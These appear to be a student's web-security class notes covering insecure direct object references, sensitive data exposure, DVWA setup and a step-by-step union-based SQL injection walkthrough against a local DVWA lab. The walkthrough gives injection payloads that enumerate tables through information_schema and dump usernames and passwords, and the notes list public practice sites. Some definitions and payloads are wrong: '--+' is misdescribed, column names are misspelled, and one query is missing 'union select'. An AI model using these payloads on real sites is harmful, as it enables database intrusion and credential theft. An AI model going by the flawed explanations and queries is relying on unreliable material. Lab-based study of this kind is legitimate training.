session10

1. SESSION 10
2. ==========
3.  
4. METHODS USED IN WEB APPLICATIONS
5. ================================
6. 1. GET - It is the method used by web applications which is unsecure and show all the transmitting data from the web application UI to its Database or server. Requests data from a specified resource.
7. eg. php?id=1, ?cat=54, ?test=query.
8.  
9. 2. POST - The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php
10.  
11. ----------------------------------------------------------
12.  
13. INSECURE DIRECT OBJECT REFERENCE
14. ================================
15. A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or a database key. Without an access control check or other protection, Attackers can directly access the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.
16.  
17. For eg. :
18.  
19. CHJM Website :
20.  
21. Accessing into another user -
22. www.chjm.org/login/.../php?id=1411 (ALEX)
23. www.chjm.org/login/../php?id=1411 ( entered into Logan's Account)
24.  
25.  
26. Accessing into pages which are not authorized to a basic user-
27. www.chjm.org/user/../settings/config.html
28.  
29. www.chjm.org/login/../php?id=logan/settings/config.html
30.  
31. EG : arvindsharma.com > Login
32. arvindsharma.com/account/login.php
33. arvindsharma.com/account/user.php?id=1337
34.  
35. URL > arvindsharma.com
36. /account/ > fOLDER
37. user.php > Code
38.  
39. 1337 > Sanjeev Multani
40. Kshitij > 1111 > 1337 > Sanjeev's account
41.  
42.  
43. ----------------------------------------------------------
44.  
45. SENSITIVE DATA EXPOSURE
46. =======================
47. Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.
48.  
49. Types of Sensitive Data
50. =======================
51.  
52. 1. Personal - Names, Address , Contact Numbers etc.
53. 2. Confidential - ID,Passwords - Credentials, Aadhar No.
54. 3. Financial - Bank Accounts numbers, credit cards, debity cards etc.
55. 4. Health Information - Policies etc.
56.  
57. Demonstration on LVS.
58.  
59.  
60. ----------------------------------------------------------
61.  
62. DVWA SETUP AND CONFIGURATION
63. ============================
64. DVWA stands for Damn Vulnerable Web Application, it is PHP MySQL based Web Application which is a organisational based understanding Web Application for OWASP TOP 10 like LVS.
65.  
66. STEPS
67. =====
68. Copy zip file into C:\xampp\htdocs
69. Right click the zip file, click on extract here
70. start xampp server, start apache and mysql
71. Go to the directory of dvwa in “htdocs”, navigate to the folder config, open the config.php file and make password=””(empty).
72. Open the browser, goto 127.0.0.1/dvwa
73. It will show you a message “Click here to create the Database”.
74. After Clicking, your Database have been created in “127.00.0.1/phpmyadmin” which will lists out all the Databases.
75. Go through the Instruction Page of LVS and then start learning through it.
76.  
77. ----------------------------------------------------------
78.  
79. OWASP A1. INJECTIONS
80. =====================
81.  
82. UNION BASED SQL INJECTION
83. =========================
84. UNION BASED SQLI is a type of attack vector in which a attacker inputs some kind of SQL Synatxes in a Input Method of a Web Application UI, And he/she can be able to communicate and access the Database.
85. The attacker extracts the data through inputting some SQL Queries into the Web Application UI and henced get the “Juicy” Data from Database -> Tables -> Columns -> Rows
86.  
87. TERMINOLOGIES
88. =============
89. 1. Information Schema : It has all of the data regarding every databases, tables, columns and every other detail of a Database. It is considered as the mother of Informations in Database.
90. 2. --+ : Everything written with --+ would be acted like a SQL QUERY.
91. 3. # : Everything entered after # will not be considered.
92. 4. database() - name of the database
93. 5. version() - version of the database.
94.  
95. Target - http://127.0.0.1/dvwa/vulnerabilities/sqli/
96.  
97. STEPS - For SQLi always recommend to use Firefox, as special symbols and spaces does not get converted into URL encode
98.  
99. STEPS
100. ======
101.  
102. Step 1: To find the GET Method/Parameter
103. eg. php?id=1
104. ?cat=24
105. ?test=query
106. Trying to click each and every possible link or will give inputs to the search boxes of GET Method.
107.  
108. “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#”
109.  
110.  
111. Step 2: Check if my site is Vulnerable or not to Union Based SQLI
112. ?id=1'
113. php?id=1'
114. If we get an error that means my website is vulnerable to Union Based SQLI.
115.  
116. It will give - “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
117. You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 “
118.  
119.  
120. Step 3: To check the number of columns present in the database
121. order by 100--+
122. order by 200--+
123. order by 300--+
124. Until we get an error of “Unknown Order Clause”.
125.  
126. Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
127. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
128. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
129. Unknown column '3' in 'order clause'
130.  
131.  
132. Step 4: To Union Select the columns which are present in the Database and is Vulnerable
133. union select 1,2--+
134.  
135. http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+ &Submit=Submit#
136.  
137.  
138. Step 5: Extracting Information from Database
139. - database()
140. - version()
141. - union select version(),2--+
142. - union select 1,version()--+
143.  
144. - union select all 1,version()--+ : 10.1.25-MariaDB
145. - union select all 1,database()--+ : dvwa
146.  
147. Step 6: Calling the Mother of Database - information_schema
148.  
149. = Extracting Table Names
150. - union select all 1,table_names from information_schema.tables--+
151.  
152. http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#
153.  
154. = After Selecting a Juicy Table, Extracting data of that table :
155. - column_name, information_schema.columns
156.  
157. - union select all 1, columns_name from information_schema.columns where table_name="users"--+
158.  
159. = To get the data from columns (user, password)
160.  
161. - union select user,password from users--+
162. - http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' group_concat(user,0x0a,password),2 from users--+
163.  
164. And we will get the Juicy Data.
165.  
166. -------------------------------------------------------------------------------
167.  
168. TESTING WEBSITES
169. ================
170. 1. http://demo.testfire.net/
171. 2. http://testphp.vulnweb.com/
172.  
173.  
174. TASKS
175. =====
176. 1. What is the Meaning of % in URL?
177. 2. What is WAF?